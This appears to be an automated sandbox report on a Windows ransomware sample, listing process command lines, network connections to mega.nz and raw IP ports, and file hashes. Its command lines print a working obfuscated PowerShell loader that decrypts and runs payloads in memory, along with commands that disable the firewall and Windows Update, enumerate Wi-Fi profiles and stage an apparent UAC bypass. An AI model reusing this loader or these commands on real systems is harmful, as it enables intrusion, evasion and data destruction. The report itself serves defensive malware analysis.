C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZPwGCBOvjNusELqY76pxZya0Lxj9wUHStDWXWQq3VFQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ikdb8NRfiUQc/X8n0b8K3w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $husQJ=New-Object System.IO.MemoryStream(,$param_var); $fctrX=New-Object System.IO.MemoryStream; $IaCEh=New-Object System.IO.Compression.GZipStream($husQJ, [IO.Compression.CompressionMode]::Decompress); $IaCEh.CopyTo($fctrX); $IaCEh.Dispose(); $husQJ.Dispose(); $fctrX.Dispose(); $fctrX.ToArray();}function execute_function($param_var,$param2_var){ $cGlFM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SXWwD=$cGlFM.EntryPoint; $SXWwD.Invoke($null, $param2_var);}$YwUMr = 'C:\Users\Admin\AppData\Local\Temp\Zero.bat';$host.UI.RawUI.WindowTitle = $YwUMr;$WBMie=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($YwUMr).Split([Environment]::NewLine);foreach ($yUchE in $WBMie) { if ($yUchE.StartsWith('eVpVeEttJiyVxTcVIRdA')) { $wGYAw=$yUchE.Substring(20); break; }}$payloads_var=[string[]]$wGYAw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1YnbLPNeUNVUVVxywIOo7MRePVU0zkaX0wmvOUU+5JI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('O1ZS4QT3iZbBumFZuklvIw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NszaK=New-Object System.IO.MemoryStream(,$param_var); $XeHtF=New-Object System.IO.MemoryStream; $IjqXl=New-Object System.IO.Compression.GZipStream($NszaK, [IO.Compression.CompressionMode]::Decompress); $IjqXl.CopyTo($XeHtF); $IjqXl.Dispose(); $NszaK.Dispose(); $XeHtF.Dispose(); $XeHtF.ToArray();}function execute_function($param_var,$param2_var){ $qIrXR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TSbzU=$qIrXR.EntryPoint; $TSbzU.Invoke($null, $param2_var);}$DsdCu = 'C:\Users\Admin\AppData\Local\Temp\Lion.bat';$host.UI.RawUI.WindowTitle = $DsdCu;$ogPYs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DsdCu).Split([Environment]::NewLine);foreach ($EVBrb in $ogPYs) { if ($EVBrb.StartsWith('amSrAwxpqNlmSpytGMiD')) { $WsuQP=$EVBrb.Substring(20); break; }}$payloads_var=[string[]]$WsuQP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"

C:\Windows \System32\ComputerDefaults.exe

"C:\Windows \System32\ComputerDefaults.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c call SC.cmd

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1YnbLPNeUNVUVVxywIOo7MRePVU0zkaX0wmvOUU+5JI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('O1ZS4QT3iZbBumFZuklvIw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NszaK=New-Object System.IO.MemoryStream(,$param_var); $XeHtF=New-Object System.IO.MemoryStream; $IjqXl=New-Object System.IO.Compression.GZipStream($NszaK, [IO.Compression.CompressionMode]::Decompress); $IjqXl.CopyTo($XeHtF); $IjqXl.Dispose(); $NszaK.Dispose(); $XeHtF.Dispose(); $XeHtF.ToArray();}function execute_function($param_var,$param2_var){ $qIrXR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TSbzU=$qIrXR.EntryPoint; $TSbzU.Invoke($null, $param2_var);}$DsdCu = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $DsdCu;$ogPYs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DsdCu).Split([Environment]::NewLine);foreach ($EVBrb in $ogPYs) { if ($EVBrb.StartsWith('amSrAwxpqNlmSpytGMiD')) { $WsuQP=$EVBrb.Substring(20); break; }}$payloads_var=[string[]]$WsuQP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff84c203cb8,0x7ff84c203cc8,0x7ff84c203cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6688 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6720 /prefetch:1

C:\Windows\SYSTEM32\cmd.exe

"cmd"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\System32\netsh.exe

"C:\Windows\System32\netsh.exe" advfirewall set allprofiles state off

C:\Windows\System32\sc.exe

"C:\Windows\System32\sc.exe" stop wuauserv

C:\Windows\System32\sc.exe

"C:\Windows\System32\sc.exe" config wuauserv start=disabled

Network

Country  Destination            Domain                             Proto
US       8.8.8.8:53             mega.nz                            udp
LU       31.216.144.5:443       mega.nz                            tcp
US       8.8.8.8:53             240.221.184.93.in-addr.arpa        udp
US       8.8.8.8:53             8.8.8.8.in-addr.arpa               udp
LU       31.216.144.5:443       mega.nz                            tcp
LU       89.44.169.132:443      eu.static.mega.co.nz               tcp
LU       89.44.169.132:443      eu.static.mega.co.nz               tcp
LU       66.203.125.12:443      g.api.mega.co.nz                   tcp
LU       66.203.125.12:443      g.api.mega.co.nz                   tcp
N/A      224.0.0.251:5353                                          udp
LU       89.44.169.132:443      eu.static.mega.co.nz               tcp
N/A      127.0.0.1:6341                                            tcp
N/A      127.0.0.1:6341                                            tcp
CA       185.206.25.16:443      gfs302n506.userstorage.mega.co.nz  tcp
CA       185.206.25.16:443      gfs302n506.userstorage.mega.co.nz  tcp
CA       185.206.25.16:443      gfs302n506.userstorage.mega.co.nz  tcp
CA       185.206.25.16:443      gfs302n506.userstorage.mega.co.nz  tcp
CA       185.206.25.16:443      gfs302n506.userstorage.mega.co.nz  tcp
US       208.95.112.1:80        ip-api.com                         tcp
US       208.95.112.1:80        ip-api.com                         tcp
US       208.95.112.1:80        ip-api.com                         tcp
US       208.95.112.1:80        ip-api.com                         tcp
US       185.208.158.139:27667                                     tcp
US       208.95.112.1:80        ip-api.com                         tcp
US       185.208.158.228:7000                                      tcp
US       208.95.112.1:80        ip-api.com                         tcp
US       185.208.158.139:27667                                     tcp
IT       185.196.8.135:7000                                        tcp
US       208.95.112.1:80        ip-api.com                         tcp
US       185.208.158.139:27667                                     tcp
US       185.208.158.139:27667                                     tcp
US       185.208.158.139:27667                                     tcp
US       185.208.158.228:7000                                      tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 0c5042350ee7871ccbfdc856bde96f3f
SHA1 90222f176bc96ec17d1bdad2d31bc994c000900c
SHA256 b8b1cb139d4d19a85adce0152fa3c4f6adfb73a322d7253820e848c6f82afc1b
SHA512 2efdb535fa6a06c4f9702b2129f2dd07c330e37fd10b492f2236007c660c1707773c22005d1e1fa580dbf633dc1a700ada3b7b611ef9accd9555a17a244f61ce

\??\pipe\LOCAL\crashpad_4152_QXQANLSMDCQHUMOR

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 5e027def9b55f3d49cde9fb82beba238
SHA1 64baabd8454c210162cbc3a90d6a2daaf87d856a
SHA256 9816e980b04f1fe7efaa4b9c83ff6a0fdd485ee65a884c001b43a0cad7c39d83
SHA512 a315e1336c5ec70cbb002969e539068ba92f3ec681b6d863db95227fd1808a778fd994e2fb03f28f0e401677aa5f7c66813e315b6b99a5065384c49586f9782e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 bcb981221a676aa609ec29f5fff9c542
SHA1 9c311b3225c378e1d3c4e2f6722960e8f14b7e05
SHA256 c3c96b2a677b920edad4166cfce056f94979d41cdcf5c0396cb496b78b969454
SHA512 1053cea240745cc595c2b745c3e81b4dfb297cd64366bb739ba1147ed234081a8841acb33acc260a04847879e5baaa875ca7894bdba9f3148074cf4c88601a28

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\File System\000\t\Paths\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 8c0851600467abf4d1734b6d4f1b2ab6
SHA1 ceda8f17c6baa4723dddd20ac89e57ec43a116d5
SHA256 fb3c2540b1fcbfa50d9645a524f5a073b5b8d957bd70cc5fec00e9f4ba3707c9
SHA512 6afa96b4a1ec339fd951e82a7f5f798e318a1e7f766102b1de5105c2fa17130e78cdbbfcc2c5e47e930d3133a3d8f5e5b334c0ccf5279007668c3f1be36c6563

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 720b67ecacc169bf7c16e53cc03f0c38
SHA1 c652b0f9cf7602fd71017016bc1bbb86bc369e77
SHA256 d4f9fb950b5b7799c0934ada57c66fbd64944cccdf2dc0cec2ae5cd62865e4bd
SHA512 8897551519bc5a825aecfa807c44b8340db59903e5f84ccc58500129dfc0ce85646425fe2b74cb4fab4950220639b80febdd02ccb623f01fcc8189d56ccacaeb

C:\Users\Admin\Downloads\Unconfirmed 72931.crdownload

MD5 df79a2e9b6b1ea5d0e21a969e47872fb
SHA1 aae0e2095979df8742a216ec22897e165aabacf2
SHA256 422239a5b1185c4cada5fc407105fe57d8f7eccfdc2fef28d44213e0657f8d08
SHA512 d8a7d56f1679e3c1ad25d413674486bf9456fb2df7a622343c75a96b74015902628fcd49a097f61bc4a181faec1018fa6be4cf6d91b336f7eef6f3d11c95159a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 b725ab4692566a8a67a90e7f02b45757
SHA1 c62c455d0b7756870805df71957ded4ede429f98
SHA256 675285ab59590e682e792a704722370ff02ba1723b840407e6bea53ce12a637c
SHA512 b9fdd097a7542a58c8db290ed522c6e670a33acf5b72bda3f8ce98e00f8a25957ae28df689a6f92e8b82d0d68332cf2897a5f06ce0f895185988adc2e8f84c19

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57b844.TMP

MD5 37674e9fe5bf4c6c80e12ef134ec115b
SHA1 74b2baf783d11d042f42339927db3db675dc7818
SHA256 942488bd26bf1478f59b24af423544217eb32901cb766b2ed4013542b922e291
SHA512 a71421b1fe77645aed3122e86397a2eb97c5830ae90d650ffc76ebaab71ce9d1219549f0ee181c3dc6706183b0a2c509dad9c5a24cc8f73901bf4c48c3899c71

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 03ef754492169e70e615a1c9a6f8f693
SHA1 7a046e9c2ced9c58afc758ae2482c26f96bdb08a
SHA256 b52bfeb8e1c3104556d6c765780fd7eeaef373d578489ef9b685ab4d45b8ec87
SHA512 1ea344da769f03c1dbfa2d2544292a4067addbf7a7c8eb2bcd5fcbfba62ac53921cf10b69a6a5f182a1567749c62fd9d944c720c39c338154767119b61cef5d3

C:\Users\Admin\Downloads\KLLauncher.bat:Zone.Identifier

MD5 fbccf14d504b7b2dbcb5a5bda75bd93b
SHA1 d59fc84cdd5217c6cf74785703655f78da6b582b
SHA256 eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913
SHA512 aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

memory/3812-215-0x0000012BB47B0000-0x0000012BB47D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lr0r4ei5.vwd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3812-223-0x0000012BB4A10000-0x0000012BB4A56000-memory.dmp

memory/3812-233-0x0000012BB49F0000-0x0000012BB4A00000-memory.dmp

memory/3812-234-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp

memory/3812-235-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp

memory/3812-236-0x0000012BB5130000-0x0000012BB52B2000-memory.dmp

C:\Windows \System32\ComputerDefaults.exe

MD5 640693107ee411d8e862ab115d7b4639
SHA1 497435f5727c5bfe31331ba245e9b7b95dc69d2a
SHA256 a2794be7cb7a4ad2f526fe91ca95a36b2ec1648b288088eaa4809402c7b2c6f4
SHA512 3a554fe1d8d23f06ac86bb078b3e5b4815722adbacbf9492b5b7ad27bf27d44dd948387268dedc2943afc3557ef234e8882475c813cc5f5f4ab566e52bbb03db

C:\Windows \System32\MLANG.dll

MD5 e286ada1af4b08fa4b7c78f862883c4e
SHA1 798ebc7b7cd3db667f1a59ade299be4cff397f39
SHA256 16eb71b68025711fdbc93229fde22ecc73dc8a23be8b40700772b96978187ea3
SHA512 fbbbc893388a39e94d8b2265aef75dbaf5fd928fadabd3dbfc5cbee64b600de0102b82e5d2b5c56efe128b45f6ddd4bba2668194c05decdfa78c8e7e382de3f5

memory/3780-259-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp

memory/3780-258-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp

memory/3780-270-0x000002556FBC0000-0x000002556FD04000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 4875ef7bbbd9ec69a21564df9a79ccef
SHA1 f4466477412c77fb6c2e317d5b4fe2bdf48b8d4f
SHA256 8c1ccd78627808d249ddf038f3e6b3eb9b68b63a2805282eec416600c5629549
SHA512 90e74486c2e321dce1c814da1a034973b562382cc356c744dd04ea880744ea461094f43f55d5d50da279ad30c4d348814a30b82471325223cff16298b3fbdefd

C:\Users\Admin\AppData\Local\Temp\Crypt.bat

MD5 2358c107f2e3a850178c60f6afb20be1
SHA1 d6a0849ba677b6fde26d132dd54c0083eacae024
SHA256 8f81bb12d135459f6bf1ab45ec9177ea4b29612af4d3f9a416dc42171e542d65
SHA512 245cc1aee968aa599f17da4e4c28c212126f008757b667b10187f072fec2b49c55fee8bc773dd7349e7b3cda7849e7f5879b0b9405d67eeaefce1d7f6b7fdcb3

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 88dc70c361a22feac57b031dd9c1f02f
SHA1 a9b4732260c2a323750022a73480f229ce25d46d
SHA256 43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59
SHA512 19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c

C:\Users\Admin\AppData\Local\Temp\Ready.bat

MD5 668a80a060086cb084f44fe2e7d70948
SHA1 5064298fb8e96230c85e988d1f13aa3ea679eee4
SHA256 cd0fa02854edb8245e74932360e97861a48aa98249409917daed8381d876cc4f
SHA512 54b3d40497c3a908564103982ce0f0a13b175bcfabd4862de21b058bda405e88b09c99161c4d38a3a039055aba14511304148e7196fed34b3ea00c92e8e1f235

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 2be01b08c0543a607976a31921b431be
SHA1 a9a5d0782d6583aada06fc44176c76e1f94b9b97
SHA256 c291b834ed17f0f1fef20d2ad721c4786074037421991fbdaf01930330c8bf1f
SHA512 e740c11501a3fc575c8ef253dffc9552555eb93873f79e30b32003d6eaf37e6e41cf39da011a356b0ca4a41b278706f1e3908ea20be1ded90100f8d8312a33c0

memory/1900-310-0x000001FECA6C0000-0x000001FECA6D0000-memory.dmp

memory/1900-311-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp

memory/1900-312-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp

memory/1900-313-0x000001FECAD80000-0x000001FECADCE000-memory.dmp

memory/4888-326-0x000001F7FD500000-0x000001F7FD510000-memory.dmp

memory/4888-328-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp

memory/4888-327-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp

memory/4888-329-0x000001F7FDBA0000-0x000001F7FDC8C000-memory.dmp

memory/4888-332-0x000001F7FDC90000-0x000001F7FDD6A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8b9a260789a22d72263ef3bb119108c
SHA1 376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256 d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

memory/4308-353-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp

memory/4308-352-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp

memory/4308-360-0x0000028CC5E70000-0x0000028CC5E86000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Zero.bat

MD5 b193cc73c1120f4e277ad9a1b242d98c
SHA1 6e99a9d4b013f299c27ad6b984a06757cedc1d23
SHA256 48a65a2e51fb4891bff918cf55231b1cc4aee129f945789b2d7f8cd988b66a02
SHA512 3593592c38590786e1187704634203b269692f69e1f0c7af417ace4d076deb74260a8f55b8a100a0cd142e4df20dfed26b5b4f83e3cbb12ecf399cd6b5180cf3

C:\Users\Admin\AppData\Local\Temp\Lion.bat

MD5 54f4209e9822dcbb808ce58ad71bb220
SHA1 bf69591a55b153acfe2f95de88240515dacb12c1
SHA256 3b435337d04e078702eff4d242a4c4a5c7580dfdcae6fd78469b02fa51d75f2b
SHA512 b5df846cec5b2802358e9718f6fa4fb38735c7f12677381cafc8c461bfa93b8685e58e179ef062a600fa8b74acd1e102068a8b921cbb2293ef70d996531d31c9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 71bda94964d6289e6fa631df9ac0f1f7
SHA1 d311bc49013b450958ff644da7b7c911b0eec0f9
SHA256 61f49244f9119a7d97fe21d9e80908ead31194b465753b618c5d6db685e40260
SHA512 7bdadaa466637894e6bab889248212ddebb9821860f32ec40182041584807ba69f82918c8ebfef1afe8e32488edd49307a29cb976cef7a1ebf32e70365cdcf02

memory/3732-389-0x000002496E920000-0x000002496E930000-memory.dmp

memory/3732-390-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp

memory/3732-391-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp

memory/3732-392-0x000002496F040000-0x000002496F0C4000-memory.dmp

memory/4612-405-0x000002BFE9A30000-0x000002BFE9A40000-memory.dmp

memory/4612-407-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp

memory/4612-408-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp

memory/4612-409-0x000002BFE9DA0000-0x000002BFE9DEE000-memory.dmp

memory/4612-412-0x000002BFE9A40000-0x000002BFE9A56000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 446dd1cf97eaba21cf14d03aebc79f27
SHA1 36e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256 a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512 a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 e566632d8956997225be604d026c9b39
SHA1 94a9aade75fffc63ed71404b630eca41d3ce130e
SHA256 b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0
SHA512 f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd

memory/5392-443-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp

memory/5392-444-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp

memory/5392-451-0x000001A6F5BE0000-0x000001A6F5C6C000-memory.dmp

memory/5576-468-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp

memory/5576-469-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp

memory/5576-472-0x0000025854E80000-0x0000025854E96000-memory.dmp

memory/5704-485-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp

memory/5704-486-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp

memory/1900-487-0x000001FECAF20000-0x000001FECAF36000-memory.dmp

memory/5392-508-0x000001A6F6710000-0x000001A6F681A000-memory.dmp

memory/5392-509-0x000001A6F6620000-0x000001A6F6632000-memory.dmp

memory/5392-510-0x000001A6F6680000-0x000001A6F66BC000-memory.dmp

memory/5392-512-0x000001A6F68A0000-0x000001A6F6916000-memory.dmp

memory/5392-513-0x000001A6F6660000-0x000001A6F667E000-memory.dmp

memory/5392-523-0x000001A6F8D30000-0x000001A6F9258000-memory.dmp

